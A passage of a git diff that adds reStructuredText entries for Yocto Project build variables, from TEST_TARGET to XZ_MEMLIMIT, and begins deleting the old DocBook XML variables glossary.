+ they depend. For example, if you append the list of tests with two
+ tests (``test_A`` and ``test_B``) where ``test_B`` is dependent on
+ ``test_A``, then you must order the tests as follows:
+ ::
+
+ TEST_SUITES = "test_A test_B"
+
+ For more information on testing images, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`TEST_TARGET`
+ Specifies the target controller to use when running tests against a
+ test image. The default controller to use is "qemu":
+ ::
+
+ TEST_TARGET = "qemu"
+
+ A target controller is a class that defines how an image gets
+ deployed on a target and how a target is started. A layer can extend
+ the controllers by adding a module in the layer's
+ ``/lib/oeqa/controllers`` directory and by inheriting the
+ ``BaseTarget`` class, which is an abstract class that cannot be used
+ as a value of ``TEST_TARGET``.
+
+ You can provide the following arguments with ``TEST_TARGET``:
+
+ - *"qemu":* Boots a QEMU image and runs the tests. See the
+ ":ref:`qemu-image-enabling-tests`" section
+ in the Yocto Project Development Tasks Manual for more
+ information.
+
+ - *"simpleremote":* Runs the tests on target hardware that is
+ already up and running. The hardware can be on the network or it
+ can be a device running an image on QEMU. You must also set
+ :term:`TEST_TARGET_IP` when you use
+ "simpleremote".
+
+ .. note::
+
+ This argument is defined in
+ ``meta/lib/oeqa/controllers/simpleremote.py``.
+
+ For information on running tests on hardware, see the
+ ":ref:`hardware-image-enabling-tests`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`TEST_TARGET_IP`
+ The IP address of your hardware under test. The ``TEST_TARGET_IP``
+ variable has no effect when :term:`TEST_TARGET` is
+ set to "qemu".
+
+ When you specify the IP address, you can also include a port. Here is
+ an example:
+ ::
+
+ TEST_TARGET_IP = "192.168.1.4:2201"
+
+ Specifying a port is
+ useful when SSH is started on a non-standard port or in cases when
+ your hardware under test is behind a firewall or network that is not
+ directly accessible from your host and you need to do port address
+ translation.
+
+ :term:`TESTIMAGE_AUTO`
+ Automatically runs the series of automated tests for images when an
+ image is successfully built. Setting ``TESTIMAGE_AUTO`` to "1" causes
+ any image that successfully builds to automatically boot under QEMU.
+ Using the variable also adds in dependencies so that any SDK for
+ which testing is requested is automatically built first.
+
+ These tests are written in Python making use of the ``unittest``
+ module, and the majority of them run commands on the target system
+ over ``ssh``. You can set this variable to "1" in your ``local.conf``
+ file in the :term:`Build Directory` to have the
+ OpenEmbedded build system automatically run these tests after an
+ image successfully builds:
+
+ TESTIMAGE_AUTO = "1"
+
+ For more information
+ on enabling, running, and writing these tests, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+ section in the Yocto Project Development Tasks Manual and the
+ ":ref:`testimage*.bbclass <ref-classes-testimage*>`" section.
+
+ :term:`THISDIR`
+ The directory in which the file BitBake is currently parsing is
+ located. Do not manually set this variable.
+
+ :term:`TIME`
+ The time the build was started. Times appear using the hour, minute,
+ and second (HMS) format (e.g. "140159" for one minute and fifty-nine
+ seconds past 1400 hours).
+
+ :term:`TMPDIR`
+ This variable is the base directory the OpenEmbedded build system
+ uses for all build output and intermediate files (other than the
+ shared state cache). By default, the ``TMPDIR`` variable points to
+ ``tmp`` within the :term:`Build Directory`.
+
+ If you want to establish this directory in a location other than the
+ default, you can uncomment and edit the following statement in the
+ ``conf/local.conf`` file in the :term:`Source Directory`:
+ ::
+
+ #TMPDIR = "${TOPDIR}/tmp"
+
+ An example use for this scenario is to set ``TMPDIR`` to a local disk,
+ which does not use NFS, while having the Build Directory use NFS.
+
+ The filesystem used by ``TMPDIR`` must have standard filesystem
+ semantics (i.e. mixed-case files are unique, POSIX file locking, and
+ persistent inodes). Due to various issues with NFS and bugs in some
+ implementations, NFS does not meet this minimum requirement.
+ Consequently, ``TMPDIR`` cannot be on NFS.
+
+ :term:`TOOLCHAIN_HOST_TASK`
+ This variable lists packages the OpenEmbedded build system uses when
+ building an SDK, which contains a cross-development environment. The
+ packages specified by this variable are part of the toolchain set
+ that runs on the :term:`SDKMACHINE`, and each
+ package should usually have the prefix ``nativesdk-``. For example,
+ consider the following command when building an SDK:
+ ::
+
+ $ bitbake -c populate_sdk imagename
+
+ In this case, a default list of packages is
+ set in this variable, but you can add additional packages to the
+ list. See the
+ ":ref:`sdk-manual/sdk-appendix-customizing-standard:adding individual packages to the standard sdk`" section
+ in the Yocto Project Application Development and the Extensible
+ Software Development Kit (eSDK) manual for more information.
+
+ For background information on cross-development toolchains in the
+ Yocto Project development environment, see the
+ ":ref:`sdk-manual/sdk-intro:the cross-development toolchain`"
+ section in the Yocto Project Overview and Concepts Manual. For
+ information on setting up a cross-development environment, see the
+ :doc:`../sdk-manual/sdk-manual` manual.
+
+ :term:`TOOLCHAIN_OUTPUTNAME`
+ This variable defines the name used for the toolchain output. The
+ :ref:`populate_sdk_base <ref-classes-populate-sdk-*>` class sets
+ the ``TOOLCHAIN_OUTPUTNAME`` variable as follows:
+ ::
+
+ TOOLCHAIN_OUTPUTNAME ?= "${SDK_NAME}-toolchain-${SDK_VERSION}"
+
+ See
+ the :term:`SDK_NAME` and
+ :term:`SDK_VERSION` variables for additional
+ information.
+
+ :term:`TOOLCHAIN_TARGET_TASK`
+ This variable lists packages the OpenEmbedded build system uses when
+ it creates the target part of an SDK (i.e. the part built for the
+ target hardware), which includes libraries and headers. Use this
+ variable to add individual packages to the part of the SDK that runs
+ on the target. See the
+ ":ref:`sdk-manual/sdk-appendix-customizing-standard:adding individual packages to the standard sdk`" section
+ in the Yocto Project Application Development and the Extensible
+ Software Development Kit (eSDK) manual for more information.
+
+ For background information on cross-development toolchains in the
+ Yocto Project development environment, see the
+ ":ref:`sdk-manual/sdk-intro:the cross-development toolchain`"
+ section in the Yocto Project Overview and Concepts Manual. For
+ information on setting up a cross-development environment, see the
+ :doc:`../sdk-manual/sdk-manual` manual.
+
+ :term:`TOPDIR`
+ The top-level :term:`Build Directory`. BitBake
+ automatically sets this variable when you initialize your build
+ environment using :ref:`structure-core-script`.
+
+ :term:`TRANSLATED_TARGET_ARCH`
+ A sanitized version of :term:`TARGET_ARCH`. This
+ variable is used where the architecture is needed in a value where
+ underscores are not allowed, for example within package filenames. In
+ this case, dash characters replace any underscore characters used in
+ ``TARGET_ARCH``.
+
+ Do not edit this variable.
+
+ :term:`TUNE_ARCH`
+ The GNU canonical architecture for a specific architecture (i.e.
+ ``arm``, ``armeb``, ``mips``, ``mips64``, and so forth). BitBake uses
+ this value to setup configuration.
+
+ ``TUNE_ARCH`` definitions are specific to a given architecture. The
+ definitions can be a single static definition, or can be dynamically
+ adjusted. You can see details for a given CPU family by looking at
+ the architecture's ``README`` file. For example, the
+ ``meta/conf/machine/include/mips/README`` file in the
+ :term:`Source Directory` provides information for
+ ``TUNE_ARCH`` specific to the ``mips`` architecture.
+
+ ``TUNE_ARCH`` is tied closely to
+ :term:`TARGET_ARCH`, which defines the target
+ machine's architecture. The BitBake configuration file
+ (``meta/conf/bitbake.conf``) sets ``TARGET_ARCH`` as follows:
+ ::
+
+ TARGET_ARCH = "${TUNE_ARCH}"
+
+ The following list, which is by no means complete since architectures
+ are configurable, shows supported machine architectures:
+
+ - arm
+ - i586
+ - x86_64
+ - powerpc
+ - powerpc64
+ - mips
+ - mipsel
+
+ :term:`TUNE_ASARGS`
+ Specifies architecture-specific assembler flags for the target
+ system. The set of flags is based on the selected tune features.
+ ``TUNE_ASARGS`` is set using the tune include files, which are
+ typically under ``meta/conf/machine/include/`` and are influenced
+ through :term:`TUNE_FEATURES`. For example, the
+ ``meta/conf/machine/include/x86/arch-x86.inc`` file defines the flags
+ for the x86 architecture as follows:
+ ::
+
+ TUNE_ASARGS += "${@bb.utils.contains("TUNE_FEATURES", "mx32", "-x32", "", d)}"
+
+ .. note::
+
+ Board Support Packages (BSPs) select the tune. The selected tune,
+ in turn, affects the tune variables themselves (i.e. the tune can
+ supply its own set of flags).
+
+ :term:`TUNE_CCARGS`
+ Specifies architecture-specific C compiler flags for the target
+ system. The set of flags is based on the selected tune features.
+ ``TUNE_CCARGS`` is set using the tune include files, which are
+ typically under ``meta/conf/machine/include/`` and are influenced
+ through :term:`TUNE_FEATURES`.
+
+ .. note::
+
+ Board Support Packages (BSPs) select the tune. The selected tune,
+ in turn, affects the tune variables themselves (i.e. the tune can
+ supply its own set of flags).
+
+ :term:`TUNE_FEATURES`
+ Features used to "tune" a compiler for optimal use given a specific
+ processor. The features are defined within the tune files and allow
+ arguments (i.e. ``TUNE_*ARGS``) to be dynamically generated based on
+ the features.
+
+ The OpenEmbedded build system verifies the features to be sure they
+ are not conflicting and that they are supported.
+
+ The BitBake configuration file (``meta/conf/bitbake.conf``) defines
+ ``TUNE_FEATURES`` as follows:
+ ::
+
+ TUNE_FEATURES ??= "${TUNE_FEATURES_tune-${DEFAULTTUNE}}"
+
+ See the :term:`DEFAULTTUNE` variable for more information.
+
+ :term:`TUNE_LDARGS`
+ Specifies architecture-specific linker flags for the target system.
+ The set of flags is based on the selected tune features.
+ ``TUNE_LDARGS`` is set using the tune include files, which are
+ typically under ``meta/conf/machine/include/`` and are influenced
+ through :term:`TUNE_FEATURES`. For example, the
+ ``meta/conf/machine/include/x86/arch-x86.inc`` file defines the flags
+ for the x86 architecture as follows:
+ ::
+
+ TUNE_LDARGS += "${@bb.utils.contains("TUNE_FEATURES", "mx32", "-m elf32_x86_64", "", d)}"
+
+ .. note::
+
+ Board Support Packages (BSPs) select the tune. The selected tune,
+ in turn, affects the tune variables themselves (i.e. the tune can
+ supply its own set of flags).
+
+ :term:`TUNE_PKGARCH`
+ The package architecture understood by the packaging system to define
+ the architecture, ABI, and tuning of output packages. The specific
+ tune is defined using the "_tune" override as follows:
+ ::
+
+ TUNE_PKGARCH_tune-tune = "tune"
+
+ These tune-specific package architectures are defined in the machine
+ include files. Here is an example of the "core2-32" tuning as used in
+ the ``meta/conf/machine/include/tune-core2.inc`` file:
+ ::
+
+ TUNE_PKGARCH_tune-core2-32 = "core2-32"
+
+ :term:`TUNEABI`
+ An underlying Application Binary Interface (ABI) used by a particular
+ tuning in a given toolchain layer. Providers that use prebuilt
+ libraries can use the ``TUNEABI``,
+ :term:`TUNEABI_OVERRIDE`, and
+ :term:`TUNEABI_WHITELIST` variables to check
+ compatibility of tunings against their selection of libraries.
+
+ If ``TUNEABI`` is undefined, then every tuning is allowed. See the
+ :ref:`sanity <ref-classes-sanity>` class to see how the variable is
+ used.
+
+ :term:`TUNEABI_OVERRIDE`
+ If set, the OpenEmbedded system ignores the
+ :term:`TUNEABI_WHITELIST` variable.
+ Providers that use prebuilt libraries can use the
+ ``TUNEABI_OVERRIDE``, ``TUNEABI_WHITELIST``, and
+ :term:`TUNEABI` variables to check compatibility of a
+ tuning against their selection of libraries.
+
+ See the :ref:`sanity <ref-classes-sanity>` class to see how the
+ variable is used.
+
+ :term:`TUNEABI_WHITELIST`
+ A whitelist of permissible :term:`TUNEABI` values. If
+ ``TUNEABI_WHITELIST`` is not set, all tunes are allowed. Providers
+ that use prebuilt libraries can use the ``TUNEABI_WHITELIST``,
+ :term:`TUNEABI_OVERRIDE`, and ``TUNEABI``
+ variables to check compatibility of a tuning against their selection
+ of libraries.
+
+ See the :ref:`sanity <ref-classes-sanity>` class to see how the
+ variable is used.
+
+ :term:`TUNECONFLICTS[feature]`
+ Specifies CPU or Application Binary Interface (ABI) tuning features
+ that conflict with feature.
+
+ Known tuning conflicts are specified in the machine include files in
+ the :term:`Source Directory`. Here is an example from
+ the ``meta/conf/machine/include/mips/arch-mips.inc`` include file
+ that lists the "o32" and "n64" features as conflicting with the "n32"
+ feature:
+ ::
+
+ TUNECONFLICTS[n32] = "o32 n64"
+
+ :term:`TUNEVALID[feature]`
+ Specifies a valid CPU or Application Binary Interface (ABI) tuning
+ feature. The specified feature is stored as a flag. Valid features
+ are specified in the machine include files (e.g.
+ ``meta/conf/machine/include/arm/arch-arm.inc``). Here is an example
+ from that file:
+ ::
+
+ TUNEVALID[bigendian] = "Enable big-endian mode."
+
+ See the machine include files in the :term:`Source Directory`
+ for these features.
+
+ :term:`UBOOT_CONFIG`
+ Configures the :term:`UBOOT_MACHINE` and can
+ also define :term:`IMAGE_FSTYPES` for individual
+ cases.
+
+ Following is an example from the ``meta-fsl-arm`` layer. ::
+
+ UBOOT_CONFIG ??= "sd"
+ UBOOT_CONFIG[sd] = "mx6qsabreauto_config,sdcard"
+ UBOOT_CONFIG[eimnor] = "mx6qsabreauto_eimnor_config"
+ UBOOT_CONFIG[nand] = "mx6qsabreauto_nand_config,ubifs"
+ UBOOT_CONFIG[spinor] = "mx6qsabreauto_spinor_config"
+
+ In this example, "sd" is selected as the configuration of the possible four for the
+ ``UBOOT_MACHINE``. The "sd" configuration defines
+ "mx6qsabreauto_config" as the value for ``UBOOT_MACHINE``, while the
+ "sdcard" specifies the ``IMAGE_FSTYPES`` to use for the U-boot image.
+
+ For more information on how the ``UBOOT_CONFIG`` is handled, see the
+ :ref:`uboot-config <ref-classes-uboot-config>`
+ class.
+
+ :term:`UBOOT_DTB_LOADADDRESS`
+ Specifies the load address for the dtb image used by U-boot. During FIT
+ image creation, the ``UBOOT_DTB_LOADADDRESS`` variable is used in
+ :ref:`kernel-fitimage <ref-classes-kernel-fitimage>` class to specify
+ the load address to be used in
+ creating the dtb sections of Image Tree Source for the FIT image.
+
+ :term:`UBOOT_DTBO_LOADADDRESS`
+ Specifies the load address for the dtbo image used by U-boot. During FIT
+ image creation, the ``UBOOT_DTBO_LOADADDRESS`` variable is used in
+ :ref:`kernel-fitimage <ref-classes-kernel-fitimage>` class to specify the load address to be used in
+ creating the dtbo sections of Image Tree Source for the FIT image.
+
+ :term:`UBOOT_ENTRYPOINT`
+ Specifies the entry point for the U-Boot image. During U-Boot image
+ creation, the ``UBOOT_ENTRYPOINT`` variable is passed as a
+ command-line parameter to the ``uboot-mkimage`` utility.
+
+ :term:`UBOOT_LOADADDRESS`
+ Specifies the load address for the U-Boot image. During U-Boot image
+ creation, the ``UBOOT_LOADADDRESS`` variable is passed as a
+ command-line parameter to the ``uboot-mkimage`` utility.
+
+ :term:`UBOOT_LOCALVERSION`
+ Appends a string to the name of the local version of the U-Boot
+ image. For example, assuming the version of the U-Boot image built
+ was "2013.10", the full version string reported by U-Boot would be
+ "2013.10-yocto" given the following statement:
+ ::
+
+ UBOOT_LOCALVERSION = "-yocto"
+
+ :term:`UBOOT_MACHINE`
+ Specifies the value passed on the ``make`` command line when building
+ a U-Boot image. The value indicates the target platform
+ configuration. You typically set this variable from the machine
+ configuration file (i.e. ``conf/machine/machine_name.conf``).
+
+ Please see the "Selection of Processor Architecture and Board Type"
+ section in the U-Boot README for valid values for this variable.
+
+ :term:`UBOOT_MAKE_TARGET`
+ Specifies the target called in the ``Makefile``. The default target
+ is "all".
+
+ :term:`UBOOT_MKIMAGE_DTCOPTS`
+ Options for the device tree compiler passed to mkimage '-D'
+ feature while creating FIT image in :ref:`kernel-fitimage <ref-classes-kernel-fitimage>` class.
+
+ :term:`UBOOT_RD_ENTRYPOINT`
+ Specifies the entrypoint for the RAM disk image.
+ During FIT image creation, the
+ ``UBOOT_RD_ENTRYPOINT`` variable is used
+ in :ref:`kernel-fitimage <ref-classes-kernel-fitimage>` class to specify the
+ entrypoint to be used in creating the Image Tree Source for
+ the FIT image.
+
+ :term:`UBOOT_RD_LOADADDRESS`
+ Specifies the load address for the RAM disk image.
+ During FIT image creation, the
+ ``UBOOT_RD_LOADADDRESS`` variable is used
+ in :ref:`kernel-fitimage <ref-classes-kernel-fitimage>` class to specify the
+ load address to be used in creating the Image Tree Source for
+ the FIT image.
+
+ :term:`UBOOT_SIGN_ENABLE`
+ Enable signing of FIT image. The default value is "0".
+
+ :term:`UBOOT_SIGN_KEYDIR`
+ Location of the directory containing the RSA key and
+ certificate used for signing FIT image.
+
+ :term:`UBOOT_SIGN_KEYNAME`
+ The name of keys used for signing U-boot FIT image stored in
+ :term:`UBOOT_SIGN_KEYDIR` directory. For e.g. dev.key key and dev.crt
+ certificate stored in :term:`UBOOT_SIGN_KEYDIR` directory will have
+ :term:`UBOOT_SIGN_KEYNAME` set to "dev".
+
+ :term:`UBOOT_SUFFIX`
+ Points to the generated U-Boot extension. For example, ``u-boot.sb``
+ has a ``.sb`` extension.
+
+ The default U-Boot extension is ``.bin``
+
+ :term:`UBOOT_TARGET`
+ Specifies the target used for building U-Boot. The target is passed
+ directly as part of the "make" command (e.g. SPL and AIS). If you do
+ not specifically set this variable, the OpenEmbedded build process
+ passes and uses "all" for the target during the U-Boot building
+ process.
+
+ :term:`UNKNOWN_CONFIGURE_WHITELIST`
+ Specifies a list of options that, if reported by the configure script
+ as being invalid, should not generate a warning during the
+ :ref:`ref-tasks-configure` task. Normally, invalid
+ configure options are simply not passed to the configure script (e.g.
+ should be removed from :term:`EXTRA_OECONF` or
+ :term:`PACKAGECONFIG_CONFARGS`).
+ However, common options, for example, exist that are passed to all
+ configure scripts at a class level that might not be valid for some
+ configure scripts. It follows that no benefit exists in seeing a
+ warning about these options. For these cases, the options are added
+ to ``UNKNOWN_CONFIGURE_WHITELIST``.
+
+ The configure arguments check that uses
+ ``UNKNOWN_CONFIGURE_WHITELIST`` is part of the
+ :ref:`insane <ref-classes-insane>` class and is only enabled if the
+ recipe inherits the :ref:`autotools <ref-classes-autotools>` class.
+
+ :term:`UPDATERCPN`
+ For recipes inheriting the
+ :ref:`update-rc.d <ref-classes-update-rc.d>` class, ``UPDATERCPN``
+ specifies the package that contains the initscript that is enabled.
+
+ The default value is "${PN}". Given that almost all recipes that
+ install initscripts package them in the main package for the recipe,
+ you rarely need to set this variable in individual recipes.
+
+ :term:`UPSTREAM_CHECK_GITTAGREGEX`
+ You can perform a per-recipe check for what the latest upstream
+ source code version is by calling ``bitbake -c checkpkg`` recipe. If
+ the recipe source code is provided from Git repositories, the
+ OpenEmbedded build system determines the latest upstream version by
+ picking the latest tag from the list of all repository tags.
+
+ You can use the ``UPSTREAM_CHECK_GITTAGREGEX`` variable to provide a
+ regular expression to filter only the relevant tags should the
+ default filter not work correctly.
+ ::
+
+ UPSTREAM_CHECK_GITTAGREGEX = "git_tag_regex"
+
+ :term:`UPSTREAM_CHECK_REGEX`
+ Use the ``UPSTREAM_CHECK_REGEX`` variable to specify a different
+ regular expression instead of the default one when the package
+ checking system is parsing the page found using
+ :term:`UPSTREAM_CHECK_URI`.
+ ::
+
+ UPSTREAM_CHECK_REGEX = "package_regex"
+
+ :term:`UPSTREAM_CHECK_URI`
+ You can perform a per-recipe check for what the latest upstream
+ source code version is by calling ``bitbake -c checkpkg`` recipe. If
+ the source code is provided from tarballs, the latest version is
+ determined by fetching the directory listing where the tarball is and
+ attempting to find a later tarball. When this approach does not work,
+ you can use ``UPSTREAM_CHECK_URI`` to provide a different URI that
+ contains the link to the latest tarball.
+ ::
+
+ UPSTREAM_CHECK_URI = "recipe_url"
+
+ :term:`USE_DEVFS`
+ Determines if ``devtmpfs`` is used for ``/dev`` population. The
+ default value used for ``USE_DEVFS`` is "1" when no value is
+ specifically set. Typically, you would set ``USE_DEVFS`` to "0" for a
+ statically populated ``/dev`` directory.
+
+ See the ":ref:`selecting-dev-manager`" section in
+ the Yocto Project Development Tasks Manual for information on how to
+ use this variable.
+
+ :term:`USE_VT`
+ When using
+ :ref:`SysVinit <new-recipe-enabling-system-services>`,
+ determines whether or not to run a
+ `getty <http://en.wikipedia.org/wiki/Getty_%28Unix%29>`__ on any
+ virtual terminals in order to enable logging in through those
+ terminals.
+
+ The default value used for ``USE_VT`` is "1" when no default value is
+ specifically set. Typically, you would set ``USE_VT`` to "0" in the
+ machine configuration file for machines that do not have a graphical
+ display attached and therefore do not need virtual terminal
+ functionality.
+
+ :term:`USER_CLASSES`
+ A list of classes to globally inherit. These classes are used by the
+ OpenEmbedded build system to enable extra features (e.g.
+ ``buildstats``, ``image-mklibs``, and so forth).
+
+ The default list is set in your ``local.conf`` file:
+ ::
+
+ USER_CLASSES ?= "buildstats image-mklibs image-prelink"
+
+ For more information, see
+ ``meta-poky/conf/local.conf.sample`` in the :term:`Source Directory`.
+
+ :term:`USERADD_ERROR_DYNAMIC`
+ If set to ``error``, forces the OpenEmbedded build system to produce
+ an error if the user identification (``uid``) and group
+ identification (``gid``) values are not defined in any of the files
+ listed in :term:`USERADD_UID_TABLES` and
+ :term:`USERADD_GID_TABLES`. If set to
+ ``warn``, a warning will be issued instead.
+
+ The default behavior for the build system is to dynamically apply
+ ``uid`` and ``gid`` values. Consequently, the
+ ``USERADD_ERROR_DYNAMIC`` variable is by default not set. If you plan
+ on using statically assigned ``gid`` and ``uid`` values, you should
+ set the ``USERADD_ERROR_DYNAMIC`` variable in your ``local.conf``
+ file as follows:
+ ::
+
+ USERADD_ERROR_DYNAMIC = "error"
+
+ Overriding the
+ default behavior implies you are going to also take steps to set
+ static ``uid`` and ``gid`` values through use of the
+ :term:`USERADDEXTENSION`,
+ :term:`USERADD_UID_TABLES`, and
+ :term:`USERADD_GID_TABLES` variables.
+
+ .. note::
+
+ There is a difference in behavior between setting
+ ``USERADD_ERROR_DYNAMIC`` to ``error`` and setting it to ``warn``.
+ When it is set to ``warn``, the build system will report a warning for
+ every undefined ``uid`` and ``gid`` in any recipe. But when it is set
+ to ``error``, it will only report errors for recipes that are actually
+ built.
+ This saves you from having to add static IDs for recipes that you
+ know will never be built.
+
+ :term:`USERADD_GID_TABLES`
+ Specifies a password file to use for obtaining static group
+ identification (``gid``) values when the OpenEmbedded build system
+ adds a group to the system during package installation.
+
+ When applying static group identification (``gid``) values, the
+ OpenEmbedded build system looks in :term:`BBPATH` for a
+ ``files/group`` file and then applies those ``uid`` values. Set the
+ variable as follows in your ``local.conf`` file:
+ ::
+
+
+ USERADD_GID_TABLES = "files/group"
+
+ .. note::
+
+ Setting the :term:`USERADDEXTENSION` variable to "useradd-staticids"
+ causes the build system to use static ``gid`` values.
+
+ :term:`USERADD_PACKAGES`
+ When inheriting the :ref:`useradd <ref-classes-useradd>` class,
+ this variable specifies the individual packages within the recipe
+ that require users and/or groups to be added.
+
+ You must set this variable if the recipe inherits the class. For
+ example, the following enables adding a user for the main package in
+ a recipe:
+ ::
+
+ USERADD_PACKAGES = "${PN}"
+
+ .. note::
+
+ It follows that if you are going to use the ``USERADD_PACKAGES``
+ variable, you need to set one or more of the :term:`USERADD_PARAM`,
+ :term:`GROUPADD_PARAM`, or :term:`GROUPMEMS_PARAM` variables.
+
+ :term:`USERADD_PARAM`
+ When inheriting the :ref:`useradd <ref-classes-useradd>` class,
+ this variable specifies for a package what parameters should pass to
+ the ``useradd`` command if you add a user to the system when the
+ package is installed.
+
+ Here is an example from the ``dbus`` recipe:
+ ::
+
+ USERADD_PARAM_${PN} = "--system --home ${localstatedir}/lib/dbus \
+ --no-create-home --shell /bin/false \
+ --user-group messagebus"
+
+ For information on the
+ standard Linux shell command ``useradd``, see
+ http://linux.die.net/man/8/useradd.
+
+ :term:`USERADD_UID_TABLES`
+ Specifies a password file to use for obtaining static user
+ identification (``uid``) values when the OpenEmbedded build system
+ adds a user to the system during package installation.
+
+ When applying static user identification (``uid``) values, the
+ OpenEmbedded build system looks in :term:`BBPATH` for a
+ ``files/passwd`` file and then applies those ``uid`` values. Set the
+ variable as follows in your ``local.conf`` file:
+ ::
+
+ USERADD_UID_TABLES = "files/passwd"
+
+ .. note::
+
+ Setting the :term:`USERADDEXTENSION` variable to "useradd-staticids"
+ causes the build system to use static ``uid`` values.
+
+ :term:`USERADDEXTENSION`
+ When set to "useradd-staticids", causes the OpenEmbedded build system
+ to base all user and group additions on a static ``passwd`` and
+ ``group`` files found in :term:`BBPATH`.
+
+ To use static user identification (``uid``) and group identification
+ (``gid``) values, set the variable as follows in your ``local.conf``
+ file: USERADDEXTENSION = "useradd-staticids"
+
+ .. note::
+
+ Setting this variable to use static ``uid`` and ``gid``
+ values causes the OpenEmbedded build system to employ the
+ :ref:`ref-classes-useradd` class.
+
+ If you use static ``uid`` and ``gid`` information, you must also
+ specify the ``files/passwd`` and ``files/group`` files by setting the
+ :term:`USERADD_UID_TABLES` and
+ :term:`USERADD_GID_TABLES` variables.
+ Additionally, you should also set the
+ :term:`USERADD_ERROR_DYNAMIC` variable.
+
+ :term:`VOLATILE_LOG_DIR`
+ Specifies the persistence of the target's ``/var/log`` directory,
+ which is used to house postinstall target log files.
+
+ By default, ``VOLATILE_LOG_DIR`` is set to "yes", which means the
+ file is not persistent. You can override this setting by setting the
+ variable to "no" to make the log directory persistent.
+
+ :term:`WARN_QA`
+ Specifies the quality assurance checks whose failures are reported as
+ warnings by the OpenEmbedded build system. You set this variable in
+ your distribution configuration file. For a list of the checks you
+ can control with this variable, see the
+ ":ref:`insane.bbclass <ref-classes-insane>`" section.
+
+ :term:`WKS_FILE`
+ Specifies the location of the Wic kickstart file that is used by the
+ OpenEmbedded build system to create a partitioned image
+ (image\ ``.wic``). For information on how to create a partitioned
+ image, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:creating partitioned images using wic`"
+ section in the Yocto Project Development Tasks Manual. For details on
+ the kickstart file format, see the ":doc:`../ref-manual/ref-kickstart`" Chapter.
+
+ :term:`WKS_FILE_DEPENDS`
+ When placed in the recipe that builds your image, this variable lists
+ build-time dependencies. The ``WKS_FILE_DEPENDS`` variable is only
+ applicable when Wic images are active (i.e. when
+ :term:`IMAGE_FSTYPES` contains entries related
+ to Wic). If your recipe does not create Wic images, the variable has
+ no effect.
+
+ The ``WKS_FILE_DEPENDS`` variable is similar to the
+ :term:`DEPENDS` variable. When you use the variable in
+ your recipe that builds the Wic image, dependencies you list in the
+ ``WIC_FILE_DEPENDS`` variable are added to the ``DEPENDS`` variable.
+
+ With the ``WKS_FILE_DEPENDS`` variable, you have the possibility to
+ specify a list of additional dependencies (e.g. native tools,
+ bootloaders, and so forth), that are required to build Wic images.
+ Following is an example:
+ ::
+
+ WKS_FILE_DEPENDS = "some-native-tool"
+
+ In the
+ previous example, some-native-tool would be replaced with an actual
+ native tool on which the build would depend.
+
+ :term:`WORKDIR`
+ The pathname of the work directory in which the OpenEmbedded build
+ system builds a recipe. This directory is located within the
+ :term:`TMPDIR` directory structure and is specific to
+ the recipe being built and the system for which it is being built.
+
+ The ``WORKDIR`` directory is defined as follows:
+ ::
+
+ ${TMPDIR}/work/${MULTIMACH_TARGET_SYS}/${PN}/${EXTENDPE}${PV}-${PR}
+
+ The actual directory depends on several things:
+
+ - :term:`TMPDIR`: The top-level build output directory
+ - :term:`MULTIMACH_TARGET_SYS`: The target system identifier
+ - :term:`PN`: The recipe name
+ - :term:`EXTENDPE`: The epoch - (if :term:`PE` is not specified, which
+ is usually the case for most recipes, then `EXTENDPE` is blank)
+ - :term:`PV`: The recipe version
+ - :term:`PR`: The recipe revision
+
+ As an example, assume a Source Directory top-level folder name
+ ``poky``, a default Build Directory at ``poky/build``, and a
+ ``qemux86-poky-linux`` machine target system. Furthermore, suppose
+ your recipe is named ``foo_1.3.0-r0.bb``. In this case, the work
+ directory the build system uses to build the package would be as
+ follows:
+ ::
+
+ poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0
+
+ :term:`XSERVER`
+ Specifies the packages that should be installed to provide an X
+ server and drivers for the current machine, assuming your image
+ directly includes ``packagegroup-core-x11-xserver`` or, perhaps
+ indirectly, includes "x11-base" in
+ :term:`IMAGE_FEATURES`.
+
+ The default value of ``XSERVER``, if not specified in the machine
+ configuration, is "xserver-xorg xf86-video-fbdev xf86-input-evdev".
+
+ :term:`XZ_THREADS`
+ Specifies the number of parallel threads that should be used when
+ using xz compression.
+
+ By default this scales with core count, but is never set less than 2
+ to ensure that multi-threaded mode is always used so that the output
+ file contents are deterministic. Builds will work with a value of 1
+ but the output will differ compared to the output from the compression
+ generated when more than one thread is used.
+
+ On systems where many tasks run in parallel, setting a limit to this
+ can be helpful in controlling system resource usage.
+
+ :term:`XZ_MEMLIMIT`
+ Specifies the maximum memory the xz compression should use as a percentage
+ of system memory. If unconstrained the xz compressor can use large amounts of
+ memory and become problematic with parallelism elsewhere in the build.
+ "50%" has been found to be a good value.
diff --git a/documentation/ref-manual/ref-variables.xml b/documentation/ref-manual/ref-variables.xml
deleted file mode 100644
index 364cd09eb8..0000000000
--- a/documentation/ref-manual/ref-variables.xml
+++ /dev/null
@@ -1,16700 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<!-- Dummy chapter -->
-<chapter id='ref-variables-glos'>
-
-<title>Variables Glossary</title>
-
-<para>
- This chapter lists common variables used in the OpenEmbedded build system and gives an overview
- of their function and contents.
-</para>
-
-<glossary id='ref-variables-glossary'>
-
-
- <para>
- <link linkend='var-ABIEXTENSION'>A</link>
- <link linkend='var-B'>B</link>
- <link linkend='var-CACHE'>C</link>
- <link linkend='var-D'>D</link>
- <link linkend='var-EFI_PROVIDER'>E</link>
- <link linkend='var-FEATURE_PACKAGES'>F</link>
- <link linkend='var-GCCPIE'>G</link>
- <link linkend='var-HOMEPAGE'>H</link>
- <link linkend='var-ICECC_DISABLED'>I</link>
-<!-- <link linkend='var-glossary-j'>J</link> -->
- <link linkend='var-KARCH'>K</link>
- <link linkend='var-LABELS'>L</link>
- <link linkend='var-MACHINE'>M</link>
- <link linkend='var-NATIVELSBSTRING'>N</link>
- <link linkend='var-OBJCOPY'>O</link>
- <link linkend='var-P'>P</link>
-<!-- <link linkend='var-glossary-q'>Q</link> -->
- <link linkend='var-RANLIB'>R</link>
- <link linkend='var-S'>S</link>
- <link linkend='var-T'>T</link>
- <link linkend='var-UBOOT_CONFIG'>U</link>
